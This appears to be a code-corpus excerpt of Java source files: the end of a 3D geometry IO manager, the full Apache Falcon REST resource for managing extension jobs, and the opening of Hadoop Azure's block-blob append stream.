    public static void writeFacets(final Stream<? extends FacetDefinition> facets, final GeometryOutput out,
            final GeometryFormat fmt) {
        getDefaultManager().writeFacets(facets, out, fmt);
    }

    /** Get the default {@link BoundaryIOManager3D} instance.
     * @return the default {@link BoundaryIOManager3D} instance
     */
    public static BoundaryIOManager3D getDefaultManager() {
        return ManagerHolder.DEFAULT_MANAGER;
    }

    /** Class holding a reference to the default IO manager instance. Initialization-on-demand
     * holder idiom: the manager is created lazily and thread-safely on first access.
     */
    private static final class ManagerHolder {

        /** Default IO manager instance. */
        private static final BoundaryIOManager3D DEFAULT_MANAGER;

        static {
            DEFAULT_MANAGER = new BoundaryIOManager3D();
            DEFAULT_MANAGER.registerDefaultHandlers();
        }

        /** Utility class; no instantiation. */
        private ManagerHolder() {}
    }
}
apache/falcon
36,007
prism/src/main/java/org/apache/falcon/resource/proxy/ExtensionManagerProxy.java
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.falcon.resource.proxy; import com.sun.jersey.multipart.FormDataBodyPart; import com.sun.jersey.multipart.FormDataParam; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.Set; import java.util.SortedMap; import java.util.TreeMap; import java.util.Properties; import javax.servlet.ServletInputStream; import javax.servlet.http.HttpServletRequest; import javax.ws.rs.Consumes; import javax.ws.rs.DefaultValue; import javax.ws.rs.GET; import javax.ws.rs.POST; import javax.ws.rs.Path; import javax.ws.rs.PathParam; import javax.ws.rs.Produces; import javax.ws.rs.QueryParam; import javax.ws.rs.core.Context; import javax.ws.rs.core.MediaType; import javax.ws.rs.core.Response; import javax.xml.bind.JAXBException; import org.apache.commons.lang.StringUtils; import org.apache.commons.io.IOUtils; import org.apache.falcon.FalconException; import org.apache.falcon.FalconWebException; import org.apache.falcon.entity.EntityUtil; import org.apache.falcon.entity.parser.ProcessEntityParser; import 
org.apache.falcon.entity.v0.Entity; import org.apache.falcon.entity.v0.EntityType; import org.apache.falcon.entity.v0.feed.Feed; import org.apache.falcon.entity.v0.process.Process; import org.apache.falcon.extensions.Extension; import org.apache.falcon.extensions.ExtensionProperties; import org.apache.falcon.extensions.ExtensionService; import org.apache.falcon.extensions.ExtensionType; import org.apache.falcon.extensions.jdbc.ExtensionMetaStore; import org.apache.falcon.extensions.store.ExtensionStore; import org.apache.falcon.persistence.ExtensionBean; import org.apache.falcon.persistence.ExtensionJobsBean; import org.apache.falcon.resource.APIResult; import org.apache.falcon.resource.AbstractExtensionManager; import org.apache.falcon.resource.ExtensionInstanceList; import org.apache.falcon.resource.ExtensionJobList; import org.apache.falcon.security.CurrentUser; import org.apache.falcon.service.Services; import org.apache.falcon.util.DeploymentUtil; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * Jersey Resource for extension job operations. 
*/ @Path("extension") public class ExtensionManagerProxy extends AbstractExtensionManager { public static final Logger LOG = LoggerFactory.getLogger(ExtensionManagerProxy.class); private Extension extension = new Extension(); private static final String README = "README"; private boolean embeddedMode = DeploymentUtil.isEmbeddedMode(); private String currentColo = DeploymentUtil.getCurrentColo(); private EntityProxyUtil entityProxyUtil = new EntityProxyUtil(); private static final String EXTENSION_PROPERTY_JSON_SUFFIX = "-properties.json"; //SUSPEND CHECKSTYLE CHECK ParameterNumberCheck @GET @Path("list{extension-name : (/[^/]+)?}") @Produces({MediaType.TEXT_XML, MediaType.APPLICATION_JSON}) public ExtensionJobList getExtensionJobs( @PathParam("extension-name") String extensionName, @DefaultValue(ASCENDING_SORT_ORDER) @QueryParam("sortOrder") String sortOrder, @DefaultValue("") @QueryParam("doAs") String doAsUser) { checkIfExtensionServiceIsEnabled(); if (StringUtils.isNotBlank(extensionName)) { extensionName = extensionName.substring(1); getExtensionIfExists(extensionName); } try { return super.getExtensionJobs(extensionName, sortOrder, doAsUser); } catch (Throwable e) { LOG.error("Failed to get extension job list of " + extensionName + ": ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @GET @Path("instances/{job-name}") @Produces(MediaType.APPLICATION_JSON) public ExtensionInstanceList getInstances( @PathParam("job-name") final String jobName, @QueryParam("start") final String nominalStart, @QueryParam("end") final String nominalEnd, @DefaultValue("") @QueryParam("instanceStatus") String instanceStatus, @DefaultValue("") @QueryParam("fields") String fields, @DefaultValue("") @QueryParam("orderBy") String orderBy, @DefaultValue("") @QueryParam("sortOrder") String sortOrder, @DefaultValue("0") @QueryParam("offset") final Integer offset, @QueryParam("numResults") Integer resultsPerPage, @DefaultValue("") 
@QueryParam("doAs") String doAsUser) { LOG.error("instances is not supported on Falcon extensions. Use Falcon instance api on individual entities."); throw FalconWebException.newAPIException("instances is not supported on Falcon extensions. Use Falcon instance " + "api on individual entities."); } @POST @Path("schedule/{job-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult schedule(@PathParam("job-name") String jobName, @Context HttpServletRequest request, @QueryParam("colo") final String coloExpr, @DefaultValue("") @QueryParam("doAs") String doAsUser) { checkIfExtensionServiceIsEnabled(); ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); ExtensionJobsBean extensionJobsBean = metaStore.getExtensionJobDetails(jobName); if (extensionJobsBean == null) { // return failure if the extension job doesn't exist LOG.error("Extension Job not found:" + jobName); throw FalconWebException.newAPIException("ExtensionJob not found:" + jobName, Response.Status.NOT_FOUND); } checkIfExtensionIsEnabled(extensionJobsBean.getExtensionName()); SortedMap<EntityType, List<String>> entityMap; try { entityMap = getJobEntities(extensionJobsBean); scheduleEntities(entityMap, request, coloExpr); } catch (FalconException e) { LOG.error("Error while scheduling entities of the extension: " + jobName + ": ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Extension job " + jobName + " scheduled successfully"); } @POST @Path("suspend/{job-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult suspend(@PathParam("job-name") String jobName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser, @QueryParam("colo") final String coloExpr) { 
checkIfExtensionServiceIsEnabled(); ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); ExtensionJobsBean extensionJobsBean = metaStore.getExtensionJobDetails(jobName); if (extensionJobsBean == null) { // return failure if the extension job doesn't exist LOG.error("Extension Job not found:" + jobName); throw FalconWebException.newAPIException("ExtensionJob not found:" + jobName, Response.Status.NOT_FOUND); } try { SortedMap<EntityType, List<String>> entityNameMap = getJobEntities(extensionJobsBean); suspendEntities(entityNameMap, coloExpr, request); } catch (FalconException e) { LOG.error("Error while suspending entities of the extension: " + jobName + ": ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Extension job " + jobName + " suspended successfully"); } private void suspendEntities(SortedMap<EntityType, List<String>> entityNameMap, String coloExpr, final HttpServletRequest request) throws FalconException { HttpServletRequest bufferedRequest = new BufferedRequest(request); for (Map.Entry<EntityType, List<String>> entityTypeEntry : entityNameMap.entrySet()) { for (final String entityName : entityTypeEntry.getValue()) { entityProxyUtil.proxySuspend(entityTypeEntry.getKey().name(), entityName, coloExpr, bufferedRequest); } } } private void resumeEntities(SortedMap<EntityType, List<String>> entityNameMap, String coloExpr, final HttpServletRequest request) throws FalconException { HttpServletRequest bufferedRequest = new BufferedRequest(request); for (Map.Entry<EntityType, List<String>> entityTypeEntry : entityNameMap.entrySet()) { for (final String entityName : entityTypeEntry.getValue()) { entityProxyUtil.proxyResume(entityTypeEntry.getKey().name(), entityName, coloExpr, bufferedRequest); } } } @POST @Path("resume/{job-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) 
public APIResult resume(@PathParam("job-name") String jobName, @Context HttpServletRequest request, @QueryParam("colo") final String coloExpr, @DefaultValue("") @QueryParam("doAs") String doAsUser) { checkIfExtensionServiceIsEnabled(); ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); ExtensionJobsBean extensionJobsBean = metaStore.getExtensionJobDetails(jobName); if (extensionJobsBean == null) { // return failure if the extension job doesn't exist LOG.error("Extension Job not found:" + jobName); throw FalconWebException.newAPIException("ExtensionJob not found:" + jobName, Response.Status.NOT_FOUND); } try { SortedMap<EntityType, List<String>> entityNameMap = getJobEntities(extensionJobsBean); resumeEntities(entityNameMap, coloExpr, request); } catch (FalconException e) { LOG.error("Error while resuming entities of the extension: " + jobName + ": ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Extension job " + jobName + " resumed successfully"); } @POST @Path("delete/{job-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult delete(@PathParam("job-name") String jobName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser) { checkIfExtensionServiceIsEnabled(); ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); ExtensionJobsBean extensionJobsBean = metaStore.getExtensionJobDetails(jobName); if (extensionJobsBean == null) { // return failure if the extension job doesn't exist return new APIResult(APIResult.Status.SUCCEEDED, "Extension job " + jobName + " doesn't exist. 
Nothing to delete."); } SortedMap<EntityType, List<String>> entityMap; try { entityMap = getJobEntities(extensionJobsBean); deleteEntities(entityMap, request); } catch (FalconException e) { LOG.error("Error when deleting extension job: " + jobName + ": ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } metaStore.deleteExtensionJob(jobName); return new APIResult(APIResult.Status.SUCCEEDED, "Extension job " + jobName + " deleted successfully"); } @POST @Path("submit/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.MULTIPART_FORM_DATA, MediaType.APPLICATION_OCTET_STREAM}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult submit( @PathParam("extension-name") String extensionName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser, @QueryParam("jobName") String jobName, @FormDataParam("processes") List<FormDataBodyPart> processForms, @FormDataParam("feeds") List<FormDataBodyPart> feedForms, @FormDataParam("config") InputStream config) { checkIfExtensionServiceIsEnabled(); checkIfExtensionIsEnabled(extensionName); checkIfExtensionJobNameExists(jobName, extensionName); SortedMap<EntityType, List<Entity>> entityMap; try { entityMap = getEntityList(extensionName, jobName, feedForms, processForms, config); submitEntities(extensionName, jobName, entityMap, config, request); } catch (FalconException | IOException | JAXBException e) { LOG.error("Error while submitting extension job: ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Extension job submitted successfully:" + jobName); } private SortedMap<EntityType, List<Entity>> getEntityList(String extensionName, String jobName, List<FormDataBodyPart> feedForms, List<FormDataBodyPart> processForms, InputStream config) throws FalconException, IOException { List<Entity> 
processes = getProcesses(processForms); List<Entity> feeds = getFeeds(feedForms); ExtensionType extensionType = getExtensionType(extensionName); List<Entity> entities; TreeMap<EntityType, List<Entity>> entityMap = new TreeMap<>(); if (ExtensionType.TRUSTED.equals(extensionType)) { entities = extension.getEntities(jobName, addJobNameToConf(config, jobName)); feeds = new ArrayList<>(); processes = new ArrayList<>(); for (Entity entity : entities) { if (EntityType.FEED.equals(entity.getEntityType())) { feeds.add(entity); } else { processes.add(entity); } } } // add tags on extension name and job EntityUtil.applyTags(extensionName, jobName, processes); EntityUtil.applyTags(extensionName, jobName, feeds); entityMap.put(EntityType.PROCESS, processes); entityMap.put(EntityType.FEED, feeds); return entityMap; } private InputStream addJobNameToConf(InputStream conf, String jobName) throws FalconException{ Properties inputProperties = new Properties(); ByteArrayOutputStream output = new ByteArrayOutputStream(); try { inputProperties.load(conf); inputProperties.setProperty(ExtensionProperties.JOB_NAME.getName(), jobName); inputProperties.store(output, null); } catch (IOException e) { LOG.error("Error in reading the config stream"); throw new FalconException("Error while reading the config stream", e); } return new ByteArrayInputStream(output.toByteArray()); } private ExtensionType getExtensionType(String extensionName) { ExtensionBean extensionDetails = getExtensionIfExists(extensionName); return extensionDetails.getExtensionType(); } private String getExtensionName(String jobName) { ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); ExtensionJobsBean extensionJobDetails = metaStore.getExtensionJobDetails(jobName); if (extensionJobDetails == null) { // return failure if the extension job doesn't exist LOG.error("Extension job not found: " + jobName); throw FalconWebException.newAPIException("Extension Job not found:" + jobName, Response.Status.NOT_FOUND); } return 
extensionJobDetails.getExtensionName(); } @POST @Path("submitAndSchedule/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.MULTIPART_FORM_DATA}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult submitAndSchedule( @PathParam("extension-name") String extensionName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser, @QueryParam("jobName") String jobName, @QueryParam("colo") final String coloExpr, @FormDataParam("processes") List<FormDataBodyPart> processForms, @FormDataParam("feeds") List<FormDataBodyPart> feedForms, @FormDataParam("config") InputStream config) { checkIfExtensionServiceIsEnabled(); checkIfExtensionIsEnabled(extensionName); checkIfExtensionJobNameExists(jobName, extensionName); SortedMap<EntityType, List<Entity>> entityMap; SortedMap<EntityType, List<String>> entityNameMap; ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); try { entityMap = getEntityList(extensionName, jobName, feedForms, processForms, config); submitEntities(extensionName, jobName, entityMap, config, request); entityNameMap = getJobEntities(metaStore.getExtensionJobDetails(jobName)); scheduleEntities(entityNameMap, request, coloExpr); } catch (FalconException | IOException | JAXBException e) { LOG.error("Error while submitting extension job: ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Extension job submitted and scheduled successfully"); } private void scheduleEntities(SortedMap<EntityType, List<String>> entityMap, HttpServletRequest request, String coloExpr) throws FalconException { HttpServletRequest bufferedRequest = new BufferedRequest(request); for (Map.Entry<EntityType, List<String>> entityTypeEntry : entityMap.entrySet()) { for (final String entityName : entityTypeEntry.getValue()) { entityProxyUtil.proxySchedule(entityTypeEntry.getKey().name(), 
entityName, coloExpr, Boolean.FALSE, "", bufferedRequest); } } } private BufferedRequest getBufferedRequest(HttpServletRequest request) { if (request instanceof BufferedRequest) { return (BufferedRequest) request; } return new BufferedRequest(request); } private void deleteEntities(SortedMap<EntityType, List<String>> entityMap, HttpServletRequest request) throws FalconException { for (Map.Entry<EntityType, List<String>> entityTypeEntry : entityMap.entrySet()) { for (final String entityName : entityTypeEntry.getValue()) { HttpServletRequest bufferedRequest = new BufferedRequest(request); entityProxyUtil.proxyDelete(entityTypeEntry.getKey().name(), entityName, bufferedRequest); if (!embeddedMode) { super.delete(bufferedRequest, entityTypeEntry.getKey().name(), entityName, currentColo); } } } } private void submitEntities(String extensionName, String jobName, SortedMap<EntityType, List<Entity>> entityMap, InputStream configStream, HttpServletRequest request) throws FalconException, IOException, JAXBException { List<Entity> feeds = entityMap.get(EntityType.FEED); List<Entity> processes = entityMap.get(EntityType.PROCESS); validateFeeds(feeds, jobName); validateProcesses(processes, jobName); List<String> feedNames = new ArrayList<>(); List<String> processNames = new ArrayList<>(); ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); byte[] configBytes = null; if (configStream != null) { configBytes = IOUtils.toByteArray(configStream); } for (Map.Entry<EntityType, List<Entity>> entry : entityMap.entrySet()) { for (final Entity entity : entry.getValue()) { if (entity.getEntityType().equals(EntityType.FEED)) { feedNames.add(entity.getName()); } else { processNames.add(entity.getName()); } } } metaStore.storeExtensionJob(jobName, extensionName, feedNames, processNames, configBytes); for(Map.Entry<EntityType, List<Entity>> entry : entityMap.entrySet()){ for(final Entity entity : entry.getValue()){ final HttpServletRequest bufferedRequest = getEntityStream(entity, 
entity.getEntityType(), request); final Set<String> colos = getApplicableColos(entity.getEntityType().toString(), entity); entityProxyUtil.proxySubmit(entity.getEntityType().toString(), bufferedRequest, entity, colos); if (!embeddedMode) { super.submit(bufferedRequest, entity.getEntityType().toString(), currentColo); } } } } private void updateEntities(String extensionName, String jobName, SortedMap<EntityType, List<Entity>> entityMap, InputStream configStream, HttpServletRequest request) throws FalconException, IOException, JAXBException { List<Entity> feeds = entityMap.get(EntityType.FEED); List<Entity> processes = entityMap.get(EntityType.PROCESS); validateFeeds(feeds, jobName); validateProcesses(processes, jobName); List<String> feedNames = new ArrayList<>(); List<String> processNames = new ArrayList<>(); for (Map.Entry<EntityType, List<Entity>> entry : entityMap.entrySet()) { for (final Entity entity : entry.getValue()) { final String entityType = entity.getEntityType().toString(); final String entityName = entity.getName(); final HttpServletRequest bufferedRequest = getEntityStream(entity, entity.getEntityType(), request); entityProxyUtil.proxyUpdate(entityType, entityName, Boolean.FALSE, bufferedRequest, entity); if (!embeddedMode) { super.update(bufferedRequest, entity.getEntityType().toString(), entity.getName(), currentColo, Boolean.FALSE); } if (entity.getEntityType().equals(EntityType.FEED)) { feedNames.add(entity.getName()); } else { processNames.add(entity.getName()); } } } ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); byte[] configBytes = null; if (configStream != null) { configBytes = IOUtils.toByteArray(configStream); } metaStore.updateExtensionJob(jobName, extensionName, feedNames, processNames, configBytes); } private HttpServletRequest getEntityStream(Entity entity, EntityType type, HttpServletRequest request) throws IOException, JAXBException { ByteArrayOutputStream baos = new ByteArrayOutputStream(); 
type.getMarshaller().marshal(entity, baos); final ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(baos.toByteArray()); ServletInputStream servletInputStream = new ServletInputStream() { public int read() throws IOException { return byteArrayInputStream.read(); } }; return getBufferedRequest(new HttpServletRequestInputStreamWrapper(request, servletInputStream)); } private void validateFeeds(List<Entity> feeds, String jobName) throws FalconException { for (Entity feed : feeds) { checkIfPartOfAnotherExtension(feed.getName(), EntityType.FEED, jobName); super.validate(feed); } } private void validateProcesses(List<Entity> processes, String jobName) throws FalconException { ProcessEntityParser processEntityParser = new ProcessEntityParser(); for (Entity process : processes) { checkIfPartOfAnotherExtension(process.getName(), EntityType.PROCESS, jobName); processEntityParser.validate((Process) process, false); } } private List<Entity> getFeeds(List<FormDataBodyPart> feedForms) { List<Entity> feeds = new ArrayList<>(); if (feedForms != null && !feedForms.isEmpty()) { for (FormDataBodyPart formDataBodyPart : feedForms) { feeds.add(formDataBodyPart.getValueAs(Feed.class)); } } return feeds; } private List<Entity> getProcesses(List<FormDataBodyPart> processForms) { List<Entity> processes = new ArrayList<>(); if (processForms != null && !processForms.isEmpty()) { for (FormDataBodyPart formDataBodyPart : processForms) { processes.add(formDataBodyPart.getValueAs(Process.class)); } } return processes; } @POST @Path("update/{job-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.MULTIPART_FORM_DATA}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult update( @PathParam("job-name") String jobName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser, @FormDataParam("processes") List<FormDataBodyPart> processForms, @FormDataParam("feeds") 
List<FormDataBodyPart> feedForms, @FormDataParam("config") InputStream config) { checkIfExtensionServiceIsEnabled(); SortedMap<EntityType, List<Entity>> entityMap; String extensionName = getExtensionName(jobName); checkIfExtensionIsEnabled(extensionName); try { entityMap = getEntityList(extensionName, jobName, feedForms, processForms, config); if (entityMap.get(EntityType.FEED).isEmpty() && entityMap.get(EntityType.PROCESS).isEmpty()) { // return failure if the extension job doesn't exist return new APIResult(APIResult.Status.FAILED, "Extension job " + jobName + " doesn't exist."); } updateEntities(extensionName, jobName, entityMap, config, request); } catch (FalconException | IOException | JAXBException e) { LOG.error("Error while updating extension job: " + jobName, e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Updated successfully"); } @POST @Path("validate/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult validate( @PathParam("extension-name") String extensionName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser) { checkIfExtensionServiceIsEnabled(); ExtensionType extensionType = getExtensionType(extensionName); if (!ExtensionType.TRUSTED.equals(extensionType)) { throw FalconWebException.newAPIException("Extension validation is supported only for trusted extensions"); } try { List<Entity> entities = extension.getEntities(extensionName, request.getInputStream()); for (Entity entity : entities) { super.validate(entity); } } catch (FalconException | IOException e) { LOG.error("Error when validating extension job: ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Validated successfully"); } // Extension store related 
REST API's @GET @Path("enumerate") @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult getExtensions() { checkIfExtensionServiceIsEnabled(); try { return super.getExtensions(); } catch (FalconWebException e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @GET @Path("describe/{extension-name}") @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult getExtensionDescription( @PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); ExtensionBean extensionBean = getExtensionIfExists(extensionName); try { String extensionResourcePath = extensionBean.getLocation() + File.separator + README; return new APIResult(APIResult.Status.SUCCEEDED, ExtensionStore.get().getResource(extensionResourcePath)); } catch (FalconException e) { throw FalconWebException.newAPIException(e, Response.Status.BAD_REQUEST); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @GET @Path("detail/{extension-name}") @Produces({MediaType.APPLICATION_JSON, MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) public APIResult getDetail(@PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); validateExtensionName(extensionName); try { return super.getExtensionDetail(extensionName); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @GET @Path("extensionJobDetails/{job-name}") @Produces({MediaType.APPLICATION_JSON, MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) public APIResult getExtensionJobDetail(@PathParam("job-name") String jobName) { checkIfExtensionServiceIsEnabled(); try { return super.getExtensionJobDetail(jobName); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @POST @Path("unregister/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_PLAIN, 
MediaType.TEXT_XML}) public APIResult deleteExtensionMetadata( @PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); try { return super.deleteExtensionMetadata(extensionName); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @POST @Path("register/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult registerExtensionMetadata( @PathParam("extension-name") String extensionName, @QueryParam("path") String path, @QueryParam("description") String description) { checkIfExtensionServiceIsEnabled(); try { return super.registerExtensionMetadata(extensionName, path, description, CurrentUser.getUser()); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @GET @Path("definition/{extension-name}") @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult getExtensionDefinition( @PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); ExtensionBean extensionBean = getExtensionIfExists(extensionName); try { ExtensionType extensionType = extensionBean.getExtensionType(); String extensionResourcePath; if (ExtensionType.TRUSTED.equals(extensionType)) { extensionResourcePath = extensionBean.getLocation() + "/META/" + extensionName.toLowerCase() + EXTENSION_PROPERTY_JSON_SUFFIX; } else { extensionResourcePath = extensionBean.getLocation() + "/META"; } return new APIResult(APIResult.Status.SUCCEEDED, ExtensionStore.get().getResource(extensionResourcePath)); } catch (FalconException e) { throw FalconWebException.newAPIException(e, Response.Status.BAD_REQUEST); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @POST @Path("disable/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_PLAIN, 
MediaType.TEXT_XML}) public APIResult disableExtension( @PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); try { return new APIResult(APIResult.Status.SUCCEEDED, super.disableExtension(extensionName, CurrentUser.getUser())); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @POST @Path("enable/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult enableExtension( @PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); try { return new APIResult(APIResult.Status.SUCCEEDED, super.enableExtension(extensionName, CurrentUser.getUser())); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } private static void checkIfExtensionServiceIsEnabled() { if (!Services.get().isRegistered(ExtensionService.SERVICE_NAME)) { LOG.error(ExtensionService.SERVICE_NAME + " is not enabled."); throw FalconWebException.newAPIException( ExtensionService.SERVICE_NAME + " is not enabled.", Response.Status.NOT_FOUND); } } }
apache/hadoop
35,789
hadoop-tools/hadoop-azure/src/main/java/org/apache/hadoop/fs/azure/BlockBlobAppendStream.java
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.fs.azure; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.OutputStream; import java.nio.ByteBuffer; import java.nio.charset.StandardCharsets; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.UUID; import java.util.Random; import java.util.concurrent.ConcurrentLinkedDeque; import java.util.concurrent.ConcurrentLinkedQueue; import java.util.concurrent.CountDownLatch; import java.util.concurrent.LinkedBlockingQueue; import java.util.concurrent.Semaphore; import java.util.concurrent.ThreadFactory; import java.util.concurrent.ThreadPoolExecutor; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicInteger; import java.util.concurrent.atomic.AtomicLong; import java.util.concurrent.atomic.AtomicReference; import org.apache.hadoop.fs.impl.StoreImplementationUtils; import org.apache.hadoop.classification.VisibleForTesting; import org.apache.hadoop.util.Preconditions; import org.apache.commons.lang3.StringUtils; import org.apache.hadoop.fs.FSExceptionMessages; import org.apache.commons.codec.binary.Base64; import 
org.apache.hadoop.fs.StreamCapabilities; import org.apache.hadoop.fs.Syncable; import org.apache.hadoop.fs.azure.StorageInterface.CloudBlockBlobWrapper; import org.apache.hadoop.io.ElasticByteBufferPool; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.microsoft.azure.storage.AccessCondition; import com.microsoft.azure.storage.OperationContext; import com.microsoft.azure.storage.StorageException; import com.microsoft.azure.storage.StorageErrorCodeStrings; import com.microsoft.azure.storage.blob.BlobRequestOptions; import com.microsoft.azure.storage.blob.BlockEntry; import com.microsoft.azure.storage.blob.BlockListingFilter; import com.microsoft.azure.storage.blob.BlockSearchMode; /** * Stream object that implements append for Block Blobs in WASB. * * The stream object implements hflush/hsync and block compaction. Block * compaction is the process of replacing a sequence of small blocks with one * big block. Azure Block blobs supports up to 50000 blocks and every * hflush/hsync generates one block. When the number of blocks is above 32000, * the process of compaction decreases the total number of blocks, if possible. * If compaction is disabled, hflush/hsync are empty functions. * * The stream object uses background threads for uploading the blocks and the * block blob list. Blocks can be uploaded concurrently. However, when the block * list is uploaded, block uploading should stop. If a block is uploaded before * the block list and the block id is not in the list, the block will be lost. * If the block is uploaded after the block list and the block id is in the * list, the block list upload will fail. The exclusive access for the block * list upload is managed by uploadingSemaphore. */ public class BlockBlobAppendStream extends OutputStream implements Syncable, StreamCapabilities { /** * The name of the blob/file. */ private final String key; /** * This variable tracks if this is new blob or existing one. 
